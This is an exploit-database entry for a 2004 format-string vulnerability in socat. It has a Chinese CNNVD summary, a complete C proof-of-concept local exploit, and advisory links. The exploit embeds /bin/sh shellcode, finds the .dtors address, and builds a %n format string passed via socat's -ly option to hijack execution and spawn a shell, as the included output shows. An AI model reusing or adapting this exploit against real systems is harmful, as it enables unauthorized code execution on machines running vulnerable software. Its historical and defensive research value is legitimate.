https://www.exploit-db.com/exploits/591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-449

socat1.4.0.3版本及之前版本的error.c中的_msg函数在被用作HTTP代理客户端并且带-ly运行时，存在格式字符串漏洞。远程攻击者或本地用户可以借助系统记录消息中的格式字符串说明符执行任意代码。

/* socat_exp.c

   Socat Format String Vulnerability

   socat <= 1.4.0.2 local exploit (Proof of Concept)

   Tested in Slackware 9.0 / 9.1 / 10.0

   by CoKi <[email protected]>
   No System Group - http://www.nosystem.com.ar
   
coki@servidor:~$ make socat_exp
coki@servidor:~$ ./socat_exp

 socat <= 1.4.0.2 local exploit (Proof of Concept)
 by CoKi <[email protected]>

 shellcode address = 0xbfffffb9
 .dtors address    = 0x080740c4

2004/10/19 09:49:46 socat[26197] E unknown syslog facility
"ÄÅÆÇ%142u%30$n%70u%31$n%256u%32$n%192u%33$n"
sh-2.05b$

This exploit does not give a root shell :(   
*/

#include <stdio.h>
#include <string.h>

#define PATH "/usr/local/bin/socat"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]=  /* aleph1 shellcode.45b */
        "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c"
        "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb"
        "x89xd8x40xcdx80xe8xdcxffxffxffx2fx62x69x6e"
        "x2fx73x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

        int i, dtorsaddr;
        unsigned int bal1, bal2, bal3, bal4;
        char temp[512];
        char buffer[1024];
        int cn1, cn2, cn3, cn4;
        FILE *f;
        char *env[3] = {shellcode, NULL};
        int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

        sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
        f = popen(temp, "r");
        if(fscanf(f, " %08x", &dtorsaddr) != 1) {
                pclose(f);
                printf("Cannot find .dtors addressn");
                exit(1);
        }
        pclose(f);
        dtorsaddr = dtorsaddr + 4;

        printf("n socat <= 1.4.0.2 local exploit (Proof of Concept)n");
        printf(" by CoKi <[email protected]>nn");
        printf(" shellcode address = %.8pn", shaddr);
        printf(" .dtors address    = %.8pnn", dtorsaddr);

        bzero(temp, sizeof(temp));
        bzero(buffer, sizeof(buffer));

        strcat(buffer, "-ly");

        for(i = 0; i < 4; i++) {
                bzero(temp, sizeof(temp));
                sprintf(temp, "%s", &dtorsaddr);
                strncat(buffer, temp, 4);
                dtorsaddr++;
        }

        bal1 = (shaddr & 0xff000000) >> 24;
        bal2 = (shaddr & 0x00ff0000) >> 16;
        bal3 = (shaddr & 0x0000ff00) >>  8;
        bal4 = (shaddr & 0x000000ff);

        cn1 = bal4 - 27 - 16;
        cn1 = check(cn1);
        cn2 = bal3 - bal4;
        cn2 = check(cn2);
        cn3 = bal2 - bal3;
        cn3 = check(cn3);
        cn4 = bal1 - bal2;
        cn4 = check(cn4);

        sprintf(temp, "%%%du%%30$n%%%du%%31$n%%%du%%32$n%%%du%%33$n", cn1, cn2, cn3, cn4);

        strcat(buffer, temp);

        execle(PATH, "socat", buffer, NULL, env);
}

int check(unsigned long addr) {
        char tmp[128];
        snprintf(tmp, sizeof(tmp), "%d", addr);
        if(atoi(tmp) < 1)
                addr = addr + 256;

        return addr;
}

// milw0rm.com [2004-10-23]

来源:XF
名称:socat-format-string(17822)
链接:http://xforce.iss.net/xforce/xfdb/17822
来源:BID
名称:11505
链接:http://www.securityfocus.com/bid/11505
来源:www.nosystem.com.ar
链接:http://www.nosystem.com.ar/advisories/advisory-07.txt
来源:GENTOO
名称:GLSA-200410-26
链接:http://www.gentoo.org/security/en/glsa/glsa-200410-26.xml
来源:SECUNIA
名称:12936
链接:http://secunia.com/advisories/12936/
来源:www.dest-unreach.org
链接:http://www.dest-unreach.org/socat/advisory/socat-adv-1.html